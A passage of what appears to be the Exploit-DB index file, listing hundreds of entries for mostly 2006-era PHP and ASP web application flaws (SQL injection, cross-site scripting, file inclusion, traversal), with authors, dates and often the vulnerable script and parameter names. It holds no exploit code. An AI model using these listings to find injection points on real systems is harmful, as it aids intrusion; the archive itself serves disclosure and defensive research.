Irzi",php,webapps, -27774,exploits/hardware/webapps/27774.py,"NETGEAR ProSafe - Information Disclosure",2013-08-22,"Juan J. Guelfo",hardware,webapps, -27776,exploits/linux/webapps/27776.rb,"Foreman (RedHat OpenStack/Satellite) - users/create Mass Assignment (Metasploit)",2013-08-22,Metasploit,linux,webapps,443 -27777,exploits/windows/webapps/27777.txt,"DeWeS 0.4.2 - Directory Traversal",2013-08-22,"High-Tech Bridge SA",windows,webapps, -27779,exploits/php/webapps/27779.txt,"Advanced Guestbook 2.x - 'Addentry.php' Remote File Inclusion",2006-04-29,[Oo],php,webapps, -27780,exploits/php/webapps/27780.txt,"4Images 1.7.1 - 'top.php?sessionid' SQL Injection",2006-04-29,CrAzY.CrAcKeR,php,webapps, -27781,exploits/php/webapps/27781.txt,"4Images 1.7.1 - 'member.php?sessionid' SQL Injection",2006-04-29,CrAzY.CrAcKeR,php,webapps, -27782,exploits/php/webapps/27782.txt,"TextFileBB 1.0.16 - Multiple Tag Script Injection Vulnerabilities",2006-04-29,r0xes,php,webapps, -27783,exploits/php/webapps/27783.txt,"W-Agora 4.2 - BBCode Script Injection",2006-04-29,r0xes,php,webapps, -27784,exploits/php/webapps/27784.txt,"PlanetGallery - 'Gallery_admin.php' Authentication Bypass",2006-04-29,tugr@,php,webapps, -27785,exploits/php/webapps/27785.txt,"DMCounter 0.9.2 -b - 'Kopf.php' Remote File Inclusion",2006-05-01,beford,php,webapps, -27786,exploits/php/webapps/27786.txt,"phpBB Knowledge Base 2.0.2 - 'Mod KB_constants.php' Remote File Inclusion",2006-05-01,[Oo],php,webapps, -27787,exploits/php/webapps/27787.txt,"MaxTrade 1.0.1 - Multiple SQL Injections",2006-05-01,r0t,php,webapps, -27788,exploits/php/webapps/27788.txt,"OrbitHYIP 2.0 - 'signup.php?referral' Cross-Site Scripting",2006-05-01,r0t,php,webapps, -27789,exploits/php/webapps/27789.txt,"OrbitHYIP 2.0 - 'members.php?id' Cross-Site Scripting",2006-05-01,r0t,php,webapps, -27792,exploits/php/webapps/27792.txt,"SunShop Shopping Cart 3.5 - Multiple Cross-Site Scripting Vulnerabilities",2006-05-01,r0t,php,webapps, -27793,exploits/php/webapps/27793.txt,"Collaborative Portal Server 3.4 - 'POS' Cross-Site Scripting",2006-05-01,r0t,php,webapps, -27794,exploits/php/webapps/27794.txt,"JSBoard 2.0.10/2.0.11 - 'login.php' Cross-Site Scripting",2006-05-02,"Alexander Klink",php,webapps, -27795,exploits/php/webapps/27795.txt,"ZenPhoto 0.9/1.0 - 'i.php?a' Cross-Site Scripting",2006-05-02,zone14,php,webapps, -27796,exploits/php/webapps/27796.txt,"ZenPhoto 0.9/1.0 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2006-05-02,zone14,php,webapps, -27797,exploits/php/webapps/27797.txt,"XDT Pro 2.3 - 'stats.php' Cross-Site Scripting",2006-05-02,almaster,php,webapps, -27798,exploits/php/webapps/27798.txt,"GeoBlog MOD_1.0 - 'viewcat.php' Cross-Site Scripting",2006-05-02,SubjectZero,php,webapps, -27799,exploits/php/webapps/27799.txt,"Virtual Hosting Control System 2.4.7.1 - 'Server_day_stats.php' Multiple Cross-Site Scripting Vulnerabilities",2006-05-02,O.U.T.L.A.W,php,webapps, -27800,exploits/php/webapps/27800.txt,"Pinnacle Cart 3.3 - 'index.php' Cross-Site Scripting",2006-05-02,r0t,php,webapps, -27803,exploits/php/webapps/27803.txt,"321soft PHP-Gallery 0.9 - 'index.php?path' Arbitrary Directory Listing",2006-05-03,d4igoro,php,webapps, -27804,exploits/php/webapps/27804.txt,"321soft PHP-Gallery 0.9 - 'index.php?path' Cross-Site Scripting",2006-05-03,d4igoro,php,webapps, -27807,exploits/php/webapps/27807.txt,"Fast Click SQL Lite 1.1.2/1.1.3 - 'show.php' Remote File Inclusion",2006-05-03,R@1D3N,php,webapps, -27808,exploits/php/webapps/27808.txt,"Pacheckbook 1.1 - 'index.php' Multiple SQL Injections",2006-05-03,almaster,php,webapps, -27809,exploits/php/webapps/27809.txt,"MyNews 1.6.2 - Multiple Cross-Site Scripting Vulnerabilities",2006-05-03,DreamLord,php,webapps, -27810,exploits/php/webapps/27810.txt,"Albinator 2.0.8 - 'dlisting.php?cid' Cross-Site Scripting",2006-05-02,r0t,php,webapps, -27811,exploits/php/webapps/27811.txt,"Albinator 2.0.8 - 'showpic.php?preloadSlideShow' Cross-Site Scripting",2006-05-02,r0t,php,webapps, -27812,exploits/php/webapps/27812.txt,"PHP Linkliste 1.0 - 'Linkliste.php' Multiple Cross-Site Scripting Vulnerabilities",2006-05-03,d4igoro,php,webapps, -27813,exploits/asp/webapps/27813.txt,"CyberBuild - 'login.asp?sessionid' SQL Injection",2006-05-03,r0t,asp,webapps, -27814,exploits/asp/webapps/27814.txt,"CyberBuild - 'browse0.htm?ProductIndex' SQL Injection",2006-05-03,r0t,asp,webapps, -27815,exploits/asp/webapps/27815.txt,"CyberBuild - 'login.asp?sessionid' Cross-Site Scripting",2006-05-03,r0t,asp,webapps, -27816,exploits/asp/webapps/27816.txt,"CyberBuild - 'browse0.htm?ProductIndex' Cross-Site Scripting",2006-05-03,r0t,asp,webapps, -27817,exploits/asp/webapps/27817.txt,"CyberBuild - 'result.asp' Multiple Cross-Site Scripting Vulnerabilities",2006-05-03,r0t,asp,webapps, -27818,exploits/php/webapps/27818.txt,"Invision Power Board 2.0/2.1 - 'index.php' SQL Injection",2006-05-04,almaster,php,webapps, -27819,exploits/php/webapps/27819.txt,"CuteNews 1.4.1 - 'search.php' Multiple Cross-Site Scripting Vulnerabilities",2006-05-05,NST,php,webapps, -27821,exploits/php/webapps/27821.html,"OpenFAQ 0.4 - 'Validate.php' HTML Injection",2006-05-06,"Kamil Sienicki",php,webapps, -27822,exploits/php/webapps/27822.txt,"MyBloggie 2.1.2/2.1.3 - BBCode IMG Tag HTML Injection",2006-05-06,zerogue,php,webapps, -27823,exploits/php/webapps/27823.txt,"openEngine 1.7/1.8 - Template Unauthorized Access",2006-05-08,ck@caroli.info,php,webapps, -27824,exploits/php/webapps/27824.txt,"Singapore 0.9.7 - 'index.php' Cross-Site Scripting",2006-05-08,alp_eren@ayyildiz.org,php,webapps, -27825,exploits/asp/webapps/27825.txt,"Ocean12 Technologies Calendar Manager Pro 1.0 1 - '/admin/main.asp?date' SQL Injection",2006-05-08,dj_eyes2005,asp,webapps, -27826,exploits/asp/webapps/27826.txt,"Ocean12 Technologies Calendar Manager Pro 1.0 1 - '/admin/view.asp?searchFor' SQL Injection",2006-05-08,dj_eyes2005,asp,webapps, -27827,exploits/asp/webapps/27827.txt,"Ocean12 Technologies Calendar Manager Pro 1.0 1 - '/admin/edit.asp?ID' SQL Injection",2006-05-08,dj_eyes2005,asp,webapps, -27828,exploits/asp/webapps/27828.txt,"Ocean12 Technologies Calendar Manager Pro 1.0 1 - '/admin/main.asp?date' Cross-Site Scripting",2006-05-08,dj_eyes2005,asp,webapps, -27829,exploits/php/webapps/27829.txt,"Phil's Bookmark Script - 'admin.php' Authentication Bypass",2006-05-08,alp_eren@ayyildiz.org,php,webapps, -27831,exploits/php/webapps/27831.txt,"Creative Software UK Community Portal 1.1 - 'ArticleView.php?article_id' SQL Injection",2006-05-08,r0t,php,webapps, -27832,exploits/php/webapps/27832.txt,"Creative Software UK Community Portal 1.1 - 'DiscView.php?forum_id' SQL Injection",2006-05-08,r0t,php,webapps, -27833,exploits/php/webapps/27833.txt,"Creative Software UK Community Portal 1.1 - 'Discussions.php?forum_id' SQL Injection",2006-05-08,r0t,php,webapps, -27834,exploits/php/webapps/27834.txt,"Creative Software UK Community Portal 1.1 - 'EventView.php?event_id' SQL Injection",2006-05-08,r0t,php,webapps, -27835,exploits/php/webapps/27835.txt,"Creative Software UK Community Portal 1.1 - 'PollResults.php' Multiple SQL Injections",2006-05-08,r0t,php,webapps, -27836,exploits/php/webapps/27836.txt,"Creative Software UK Community Portal 1.1 - 'DiscReply.php?mid' SQL Injection",2006-05-08,r0t,php,webapps, -27837,exploits/php/webapps/27837.txt,"EvoTopsite 2.0 - 'index.php' Multiple SQL Injections",2006-05-08,"Hamid Ebadi",php,webapps, -27838,exploits/php/webapps/27838.txt,"timobraun Dynamic Galerie 1.0 - 'index.php?pfad' Arbitrary Directory Listing",2006-05-08,d4igoro,php,webapps, -27839,exploits/php/webapps/27839.txt,"timobraun Dynamic Galerie 1.0 - 'galerie.php?pfad' Arbitrary Directory Listing",2006-05-08,d4igoro,php,webapps, -27840,exploits/php/webapps/27840.txt,"timobraun Dynamic Galerie 1.0 - 'index.php?pfad' Cross-Site Scripting",2006-05-08,d4igoro,php,webapps, -27841,exploits/php/webapps/27841.txt,"timobraun Dynamic Galerie 1.0 - 'galerie.php?id' Cross-Site Scripting",2006-05-08,d4igoro,php,webapps, -27842,exploits/asp/webapps/27842.txt,"MultiCalendars 3.0 - 'All_calendars.asp' SQL Injection",2006-05-09,Dj_Eyes,asp,webapps, -27843,exploits/php/webapps/27843.txt,"MyBB 1.1.1 - 'showthread.php' SQL Injection",2006-05-09,Breeeeh,php,webapps, -27844,exploits/asp/webapps/27844.txt,"EPublisherPro 0.9.7 - 'Moreinfo.asp' Cross-Site Scripting",2006-05-09,Dj_Eyes,asp,webapps, -27845,exploits/php/webapps/27845.php,"ISPConfig 2.2.2/2.2.3 - 'Session.INC.php' Remote File Inclusion",2006-05-09,ReZEN,php,webapps, -27846,exploits/asp/webapps/27846.txt,"EImagePro - 'subList.asp?CatID' SQL Injection",2006-05-09,Dj_Eyes,asp,webapps, -27848,exploits/php/webapps/27848.txt,"EImagePro - 'view.asp?Pic' SQL Injection",2006-05-09,Dj_Eyes,php,webapps, -27849,exploits/asp/webapps/27849.txt,"EDirectoryPro - 'Search_result.asp' SQL Injection",2006-05-09,Dj_Eyes,asp,webapps, -27853,exploits/cfm/webapps/27853.txt,"Cartweaver 2.16.11 - 'Results.cfm' SQL Injection",2006-04-25,r0t,cfm,webapps, -27858,exploits/php/webapps/27858.txt,"phpBB Chart Mod 1.1 - 'charts.php?id' Cross-Site Scripting",2006-05-11,sn4k3.23,php,webapps, -27859,exploits/php/webapps/27859.txt,"OZJournals 1.2 - 'Vname' Cross-Site Scripting",2006-05-12,Kiki,php,webapps, -27863,exploits/php/webapps/27863.txt,"phpBB 2.0.20 - Unauthorized HTTP Proxy",2006-05-12,rgod,php,webapps, -27864,exploits/php/webapps/27864.txt,"Gphotos 1.4/1.5 - 'index.php?rep' Cross-Site Scripting",2006-05-13,"Morocco Security Team",php,webapps, -27865,exploits/php/webapps/27865.txt,"Gphotos 1.4/1.5 - 'diapo.php?rep' Cross-Site Scripting",2006-05-13,"Morocco Security Team",php,webapps, -27866,exploits/php/webapps/27866.txt,"Gphotos 1.4/1.5 - 'affich.php?image' Cross-Site Scripting",2006-05-13,"Morocco Security Team",php,webapps, -27867,exploits/php/webapps/27867.txt,"Gphotos 1.4/1.5 - 'index.php?rep' Traversal Arbitrary Directory Listing",2006-05-13,"Morocco Security Team",php,webapps, -27868,exploits/php/webapps/27868.txt,"Pixaria PopPhoto 3.5.4 - 'CFG[popphoto_base_path]' Remote File Inclusion",2006-05-15,VietMafia,php,webapps, -27869,exploits/php/webapps/27869.txt,"PHP Script Tools PSY Auction - 'item.php?id' SQL Injection",2006-05-15,Luny,php,webapps, -27870,exploits/php/webapps/27870.txt,"PHP Script Tools PSY Auction - 'email_request.php?user_id' Cross-Site Scripting",2006-05-15,Luny,php,webapps, -27871,exploits/php/webapps/27871.txt,"mooSocial 1.3 - Multiple Vulnerabilities",2013-08-26,Esac,php,webapps, -27872,exploits/php/webapps/27872.txt,"PhpVibe 3.1 - Multiple Vulnerabilities",2013-08-26,Esac,php,webapps, -27876,exploits/php/webapps/27876.txt,"MusicBox 2.3.8 - Multiple Vulnerabilities",2013-08-26,DevilScreaM,php,webapps, -27878,exploits/hardware/webapps/27878.txt,"Loftek Nexus 543 IP Cameras - Multiple Vulnerabilities",2013-08-26,"Craig Young",hardware,webapps, -27879,exploits/php/webapps/27879.txt,"Joomla! Component com_virtuemart 2.0.22a - SQL Injection",2013-08-26,"Matias Fontanini",php,webapps, -27880,exploits/php/webapps/27880.pl,"RadScripts RadLance 7.0 - 'popup.php' Local File Inclusion",2006-05-15,Mr.CrackerZ,php,webapps, -27881,exploits/php/webapps/27881.txt,"PHPODP 1.5 - 'ODP.php' Cross-Site Scripting",2006-05-15,Kiki,php,webapps, -27883,exploits/php/webapps/27883.txt,"MonoChat 1.0 - HTML Injection",2005-05-15,X-BOY,php,webapps, -27884,exploits/php/webapps/27884.txt,"Confixx 3.0/3.1 - 'index.php' Cross-Site Scripting",2006-05-15,LoK-Crew,php,webapps, -27885,exploits/php/webapps/27885.txt,"PHPRemoteView - 'PRV.php' Multiple Cross-Site Scripting Vulnerabilities",2006-05-16,Soot,php,webapps, -27886,exploits/php/webapps/27886.txt,"Sphider 1.3 - 'search.php' Multiple Cross-Site Scripting Vulnerabilities",2006-05-16,Soot,php,webapps, -27888,exploits/java/webapps/27888.txt,"Caucho Resin 3.0.17/3.0.18 - Viewfile Information Disclosure",2006-05-16,"Joseph Pierini",java,webapps, -27889,exploits/php/webapps/27889.txt,"BoastMachine 3.1 - 'admin.php' Cross-Site Scripting",2006-05-17,"Yunus Emre Yilmaz",php,webapps, -27890,exploits/asp/webapps/27890.txt,"Open Wiki 0.78 - 'ow.asp' Cross-Site Scripting",2006-05-17,LiNuX_rOOt,asp,webapps, -27895,exploits/cgi/webapps/27895.txt,"Cosmoshop 8.10.78/8.11.106 - 'Lshop.cgi' SQL Injection",2006-05-18,l0om,cgi,webapps, -27896,exploits/asp/webapps/27896.txt,"ASPBB 0.5.2 - 'default.asp?action' Cross-Site Scripting",2006-05-18,TeufeL,asp,webapps, -27897,exploits/asp/webapps/27897.txt,"ASPBB 0.5.2 - 'profile.asp?get' Cross-Site Scripting",2006-05-18,TeufeL,asp,webapps, -27898,exploits/asp/webapps/27898.txt,"CodeAvalanche News 1.2 - 'default.asp' SQL Injection",2006-05-19,omnipresent,asp,webapps, -27899,exploits/php/webapps/27899.txt,"JemWeb DownloadControl 1.0 - 'DC.php' SQL Injection",2006-05-19,Luny,php,webapps, -27900,exploits/php/webapps/27900.txt,"Artmedic NewsLetter 4.1 - 'Log.php' Remote Script Execution",2006-05-19,C.Schmitz,php,webapps, -27904,exploits/php/webapps/27904.txt,"DoceboLms 2.0.x/3.0.x / DoceboKms 3.0.3 / Docebo CMS 3.0.x - Multiple Remote File Inclusions",2006-05-23,Kacper,php,webapps, -27905,exploits/php/webapps/27905.txt,"DoceboLms 2.0.x - 'Lang' Multiple Remote File Inclusions",2006-05-26,beford,php,webapps, -27907,exploits/php/webapps/27907.txt,"SaPHPLesson 2.0 - 'show.php' SQL Injection",2006-05-27,SwEET-DeViL,php,webapps, -27908,exploits/php/webapps/27908.txt,"Chipmunk 1.4 - 'Guestbook index.php' Cross-Site Scripting",2006-05-27,black-code,php,webapps, -27909,exploits/php/webapps/27909.txt,"Chipmunk Directory - 'index.php' Cross-Site Scripting",2006-05-27,black-code,php,webapps, -27910,exploits/php/webapps/27910.txt,"AR-Blog 5.2 - Multiple Cross-Site Scripting Vulnerabilities",2006-05-27,black-code,php,webapps, -27911,exploits/php/webapps/27911.txt,"vCard 2.9 - Multiple Cross-Site Scripting Vulnerabilities",2006-03-11,black-code,php,webapps, -27912,exploits/php/webapps/27912.txt,"CoolPHP - 'index.php' Cross-Site Scripting",2006-05-27,black-code,php,webapps, -27913,exploits/asp/webapps/27913.txt,"Mini-NUKE 2.3 - 'Your_Account.asp' Multiple SQL Injections",2006-05-29,"Mustafa Can Bjorn",asp,webapps, -27916,exploits/php/webapps/27916.txt,"Photoalbum B&W 1.3 - 'index.php' Cross-Site Scripting",2006-05-29,black-code,php,webapps, -27917,exploits/php/webapps/27917.txt,"TikiWiki 1.9 - 'tiki-lastchanges.php' Multiple Cross-Site Scripting Vulnerabilities",2006-05-29,Blwood,php,webapps, -27918,exploits/asp/webapps/27918.txt,"ASPBB 0.5.2 - 'Perform_search.asp' Cross-Site Scripting",2006-05-29,"Mustafa Can Bjorn",asp,webapps, -27919,exploits/php/webapps/27919.txt,"Geeklog 1.4 - Multiple Input Validation Vulnerabilities",2006-05-11,trueend5,php,webapps, -27920,exploits/php/webapps/27920.txt,"EVA-Web 2.1.2 - 'article-album.php3?debut_image' Cross-Site Scripting",2006-05-30,r0t,php,webapps, -27921,exploits/php/webapps/27921.txt,"EVA-Web 2.1.2 - 'rubrique.php3?date' Cross-Site Scripting",2006-05-30,r0t,php,webapps, -27922,exploits/php/webapps/27922.txt,"EVA-Web 2.1.2 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2006-05-30,r0t,php,webapps, -27924,exploits/php/webapps/27924.txt,"ToendaCMS 0.7 - 'index.php' Cross-Site Scripting",2006-05-31,Jokubas,php,webapps, -27926,exploits/php/webapps/27926.txt,"PHPMyDesktop/Arcade 1.0 - 'index.php' Local File Inclusion",2006-05-31,darkgod,php,webapps, -27927,exploits/php/webapps/27927.txt,"PHP-Nuke 7.x - Multiple Remote File Inclusions",2005-05-31,ERNE,php,webapps, -27928,exploits/php/webapps/27928.txt,"osTicket 1.x - 'Open_form.php' Remote File Inclusion",2006-05-31,Sweet,php,webapps, -27929,exploits/php/webapps/27929.txt,"vBulletin 3.0.10 - 'Portal.php' SQL Injection",2006-05-31,SpC-x,php,webapps, -27932,exploits/asp/webapps/27932.txt,"Hogstorps Guestbook 2.0 - Unauthorized Access",2006-05-01,omnipresent,asp,webapps, -27933,exploits/php/webapps/27933.txt,"Tekno.Portal - 'Bolum.php' SQL Injection",2006-06-01,SpC-x,php,webapps, -27934,exploits/php/webapps/27934.txt,"Abarcar Realty Portal 5.1.5 - 'content.php' SQL Injection",2006-06-01,SpC-x,php,webapps, -27994,exploits/php/webapps/27994.txt,"Open Business Management 1.0.3 pl1 - 'publication_index.php?tf_lang' Cross-Site Scripting",2006-06-07,r0t,php,webapps, -27995,exploits/php/webapps/27995.txt,"Open Business Management 1.0.3 pl1 - 'group_index.php' Multiple Cross-Site Scripting Vulnerabilities",2006-06-07,r0t,php,webapps, -27996,exploits/php/webapps/27996.txt,"Open Business Management 1.0.3 pl1 - 'user_index.php?tf_lastname' Cross-Site Scripting",2006-06-07,r0t,php,webapps, -27997,exploits/php/webapps/27997.txt,"Open Business Management 1.0.3 pl1 - 'list_index.php' Multiple Cross-Site Scripting Vulnerabilities",2006-06-07,r0t,php,webapps, -28394,exploits/php/webapps/28394.pl,"Fusionphp Fusion News 3.7 - 'index.php' Remote File Inclusion",2006-08-16,O.U.T.L.A.W,php,webapps, -27945,exploits/asp/webapps/27945.txt,"Enigma Haber 4.2 - Cross-Site Scripting",2006-06-02,The_BeKiR,asp,webapps, -27946,exploits/php/webapps/27946.txt,"Portix-PHP 2-0.3.2 Portal - Multiple Cross-Site Scripting Vulnerabilities",2006-06-02,SpC-x,php,webapps, -27947,exploits/php/webapps/27947.txt,"TAL RateMyPic 1.0 - Multiple Input Validation Vulnerabilities",2006-06-02,Luny,php,webapps, -27948,exploits/php/webapps/27948.txt,"Squirrelmail 1.4.x - 'Redirect.php' Local File Inclusion",2006-06-02,brokejunker,php,webapps, -27949,exploits/php/webapps/27949.txt,"Ovidentia 5.6.x/5.8 - 'approb.php?babInstallPath' Remote File Inclusion",2006-06-02,black-cod3,php,webapps, -27950,exploits/php/webapps/27950.txt,"Ovidentia 5.6.x/5.8 - 'vacadmb.php?babInstallPath' Remote File Inclusion",2006-06-02,black-cod3,php,webapps, -27951,exploits/php/webapps/27951.txt,"Ovidentia 5.6.x/5.8 - 'vacadma.php?babInstallPath' Remote File Inclusion",2006-06-02,black-cod3,php,webapps, -27952,exploits/php/webapps/27952.txt,"Ovidentia 5.6.x/5.8 - 'vacadm.php?babInstallPath' Remote File Inclusion",2006-06-02,black-cod3,php,webapps, -27953,exploits/php/webapps/27953.txt,"Ovidentia 5.6.x/5.8 - 'statart.php?babInstallPath' Remote File Inclusion",2006-06-02,black-cod3,php,webapps, -27954,exploits/php/webapps/27954.txt,"Ovidentia 5.6.x/5.8 - 'search.php?babInstallPath' Remote File Inclusion",2006-06-02,black-cod3,php,webapps, -27955,exploits/php/webapps/27955.txt,"Ovidentia 5.6.x/5.8 - 'posts.php?babInstallPath' Remote File Inclusion",2006-06-02,black-cod3,php,webapps, -27956,exploits/php/webapps/27956.txt,"Ovidentia 5.6.x/5.8 - 'options.php?babInstallPath' Remote File Inclusion",2006-06-02,black-cod3,php,webapps, -27958,exploits/php/webapps/27958.txt,"DELTAScripts PHP Pro Publish 2.0 - Multiple Cross-Site Scripting Vulnerabilities",2006-06-02,Soot,php,webapps, -27959,exploits/php/webapps/27959.txt,"PHP ManualMaker 1.0 - Multiple Input Validation Vulnerabilities",2006-06-02,Luny,php,webapps, -27960,exploits/asp/webapps/27960.txt,"LocazoList Classifieds 1.0 - 'Viewmsg.asp' SQL Injection",2006-06-02,ajann,asp,webapps, -27961,exploits/php/webapps/27961.txt,"phpBB 2.0.x - 'template.php' Remote File Inclusion",2006-06-02,Canberx,php,webapps, -27962,exploits/php/webapps/27962.txt,"IBWd Guestbook 1.0 - 'index.php' SQL Injection",2006-06-03,SpC-x,php,webapps, -27963,exploits/php/webapps/27963.txt,"XUEBook 1.0 - 'index.php' SQL Injection",2006-06-03,SpC-x,php,webapps, -27964,exploits/php/webapps/27964.txt,"CoolForum 0.x - 'editpost.php' SQL Injection",2006-06-05,DarkFig,php,webapps, -27979,exploits/php/webapps/27979.html,"myNewsletter 1.1.2 - 'Username' SQL Injection",2006-06-05,FarhadKey,php,webapps, -27980,exploits/php/webapps/27980.txt,"Alex DownloadEngine 1.4.1 - 'comments.php' SQL Injection",2006-06-05,ajann,php,webapps, -27982,exploits/php/webapps/27982.txt,"GANTTy 1.0.3 - 'index.php' Cross-Site Scripting",2006-06-06,Luny,php,webapps, -27985,exploits/php/webapps/27985.txt,"AZ Photo Album Script Pro - Cross-Site Scripting",2006-05-23,Luny,php,webapps, -27988,exploits/php/webapps/27988.py,"MiraksGalerie 2.62 - 'galimage.lib.php?listconfigfile[0]' Remote File Inclusion",2006-06-07,"Federico Fazzi",php,webapps, -27989,exploits/php/webapps/27989.txt,"MiraksGalerie 2.62 - 'galsecurity.lib.php?listconfigfile[0]' Remote File Inclusion",2006-06-07,"Federico Fazzi",php,webapps, -27998,exploits/php/webapps/27998.txt,"Open Business Management 1.0.3 pl1 - 'company_index.php' Multiple Cross-Site Scripting Vulnerabilities",2006-06-07,r0t,php,webapps, -27999,exploits/php/webapps/27999.txt,"Baby Katie Media VSReal and VScal 1.0 - 'index.php?lid' Cross-Site Scripting",2006-06-09,Luny,php,webapps, -28000,exploits/php/webapps/28000.txt,"Baby Katie Media VSReal and VScal 1.0 - 'myslideshow.php?title' Cross-Site Scripting",2006-06-09,Luny,php,webapps, -28002,exploits/asp/webapps/28002.txt,"KAPhotoservice 7.5 - 'album.asp?cat' Cross-Site Scripting",2006-06-09,r0t,asp,webapps, -28003,exploits/asp/webapps/28003.txt,"KAPhotoservice 7.5 - 'albums.asp?albumid' Cross-Site Scripting",2006-06-09,r0t,asp,webapps, -28004,exploits/asp/webapps/28004.txt,"KAPhotoservice 7.5 - 'edtalbum.asp' Multiple Cross-Site Scripting Vulnerabilities",2006-06-09,r0t,asp,webapps, -28006,exploits/php/webapps/28006.txt,"NPDS 5.10 - Multiple Input Validation Vulnerabilities",2006-06-12,DarkFig,php,webapps, -28008,exploits/php/webapps/28008.txt,"Adaptive Website Framework 1.11 - Remote File Inclusion",2006-06-12,"Federico Fazzi",php,webapps, -28009,exploits/php/webapps/28009.txt,"Five Star Review Script - 'index2.php?sort' Cross-Site Scripting",2006-06-12,Luny,php,webapps, -28010,exploits/php/webapps/28010.txt,"Five Star Review Script - 'report.php?item_id' Cross-Site Scripting",2006-06-12,Luny,php,webapps, -28011,exploits/php/webapps/28011.txt,"iFoto 0.20 - 'index.php' Cross-Site Scripting",2006-06-12,Luny,php,webapps, -28012,exploits/php/webapps/28012.txt,"Foing 0.x - Remote File Inclusion",2006-06-12,Darkfire,php,webapps, -28013,exploits/php/webapps/28013.txt,"SixCMS 6.0 - 'list.php' Cross-Site Scripting",2006-06-12,Aesthetico,php,webapps, -28014,exploits/php/webapps/28014.txt,"SixCMS 6.0 - 'detail.php' Directory Traversal",2006-06-12,Aesthetico,php,webapps, -28015,exploits/php/webapps/28015.txt,"iFusion iFlance 1.1 - Multiple Input Validation Vulnerabilities",2006-06-12,Luny,php,webapps, -28016,exploits/php/webapps/28016.txt,"DoubleSpeak 0.1 - Multiple Remote File Inclusions",2006-06-13,R@1D3N,php,webapps, -28017,exploits/php/webapps/28017.txt,"CEScripts (Multiple Scripts) - Cross-Site Scripting",2006-06-13,Luny,php,webapps, -28018,exploits/php/webapps/28018.txt,"VBZoom 1.0/1.1 - Multiple SQL Injections",2006-06-13,"CrAzY CrAcKeR",php,webapps, -28019,exploits/php/webapps/28019.txt,"Simpnews 2.x - 'Wap_short_news.php' Remote File Inclusion",2006-06-13,SpC-x,php,webapps, -28020,exploits/php/webapps/28020.txt,"Andy Mack 35mm Slide Gallery 6.0 - 'index.php?imgdir' Cross-Site Scripting",2006-06-13,black-cod3,php,webapps, -28021,exploits/php/webapps/28021.txt,"Andy Mack 35mm Slide Gallery 6.0 - 'popup.php' Multiple Cross-Site Scripting Vulnerabilities",2006-06-13,black-cod3,php,webapps, -28022,exploits/php/webapps/28022.txt,"Woltlab Burning Board 2.x - Multiple SQL Injections",2006-06-14,"CrAzY CrAcKeR",php,webapps, -28023,exploits/php/webapps/28023.txt,"Confixx 3.0/3.1 - 'FTP_index.php' Cross-Site Scripting",2006-06-14,kr4ch,php,webapps, -28024,exploits/php/webapps/28024.txt,"phpBB - 'BBRSS.php' Remote File Inclusion",2006-06-14,SpC-x,php,webapps, -28025,exploits/php/webapps/28025.txt,"RahnemaCo - 'page.php' Remote File Inclusion",2006-06-14,Breeeeh,php,webapps, -28027,exploits/php/webapps/28027.txt,"ISPConfig 2.2.3 - Multiple Remote File Inclusions",2006-06-14,"Federico Fazzi",php,webapps, -28028,exploits/php/webapps/28028.txt,"vBulletin 2.x/3.x - Multiple Cross-Site Scripting Vulnerabilities",2006-06-15,Luny,php,webapps, -28060,exploits/php/webapps/28060.txt,"Datecomm 1.1 - Multiple Cross-Site Scripting Vulnerabilities",2006-06-19,Luny,php,webapps, -28059,exploits/php/webapps/28059.txt,"SaphpLesson 1.1/2.0/3.0 - Multiple SQL Injections",2006-06-19,"CrAzY CrAcKeR",php,webapps, -28031,exploits/php/webapps/28031.txt,"HotPlug CMS 1.0 - 'Login1.php' Cross-Site Scripting",2006-06-15,"Federico Fazzi",php,webapps, -28032,exploits/php/webapps/28032.txt,"MPCS 0.2 - 'comment.php' Cross-Site Scripting",2006-03-06,Luny,php,webapps, -28033,exploits/php/webapps/28033.txt,"VBZoom 1.11 - 'forum.php' SQL Injection",2006-06-15,CrAsh_oVeR_rIdE,php,webapps, -28034,exploits/php/webapps/28034.txt,"Ji-takz - Remote File Inclusion",2006-06-16,SpC-x,php,webapps, -28035,exploits/php/webapps/28035.txt,"mcGuestbook 1.3 - 'admin.php?lang' Remote File Inclusion",2006-06-16,SwEET-DeViL,php,webapps, -28036,exploits/php/webapps/28036.txt,"mcGuestbook 1.3 - 'ecrire.php?lang' Remote File Inclusion",2006-06-16,SwEET-DeViL,php,webapps, -28037,exploits/php/webapps/28037.txt,"mcGuestbook 1.3 - 'lire.php?lang' Remote File Inclusion",2006-06-16,SwEET-DeViL,php,webapps, -28038,exploits/php/webapps/28038.txt,"Indexu 5.0.1 - Multiple Remote File Inclusions",2006-06-16,CrAsh_oVeR_rIdE,php,webapps, -28039,exploits/php/webapps/28039.txt,"dotWidget for articles 2.0 - 'showcatpicks.php?file_path' Remote File Inclusion",2006-06-03,SwEET-DeViL,php,webapps, -28040,exploits/php/webapps/28040.txt,"dotWidget for articles 2.0 - 'showarticle.php?file_path' Remote File Inclusion",2006-06-03,SwEET-DeViL,php,webapps, -28041,exploits/php/webapps/28041.txt,"dotWidget for articles 2.0 - '/admin/authors.php' Multiple Remote File Inclusions",2006-06-03,SwEET-DeViL,php,webapps, -28042,exploits/php/webapps/28042.txt,"dotWidget for articles 2.0 - '/admin/articles.php' Multiple Remote File Inclusions",2006-06-03,SwEET-DeViL,php,webapps, -28043,exploits/php/webapps/28043.txt,"dotWidget for articles 2.0 - '/admin/index.php' Multiple Remote File Inclusions",2006-06-03,SwEET-DeViL,php,webapps, -28045,exploits/php/webapps/28045.txt,"dotWidget for articles 2.0 - '/admin/categories.php' Multiple Remote File Inclusions",2006-06-03,SwEET-DeViL,php,webapps, -28063,exploits/php/webapps/28063.txt,"e107 0.7.5 - 'search.php' Cross-Site Scripting",2006-06-19,securityconnection,php,webapps, -28064,exploits/php/webapps/28064.txt,"Qto File Manager 1.0 - 'index.php' Cross-Site Scripting",2006-03-06,alijsb,php,webapps, -28066,exploits/php/webapps/28066.txt,"Singapore 0.9.x/0.10 - Multiple Traversal Arbitrary File Access",2006-06-19,simo64,php,webapps, -28067,exploits/php/webapps/28067.txt,"Singapore 0.9.x/0.10 - 'index.php?template' Cross-Site Scripting",2006-06-19,simo64,php,webapps, -28068,exploits/php/webapps/28068.txt,"V3 Chat Instant Messenger - '/mail/index.php?id' Cross-Site Scripting",2006-06-20,Luny,php,webapps, -28069,exploits/php/webapps/28069.txt,"V3 Chat Instant Messenger - '/mail/reply.php?id' Cross-Site Scripting",2006-06-20,Luny,php,webapps, -28070,exploits/php/webapps/28070.txt,"V3 Chat Instant Messenger - 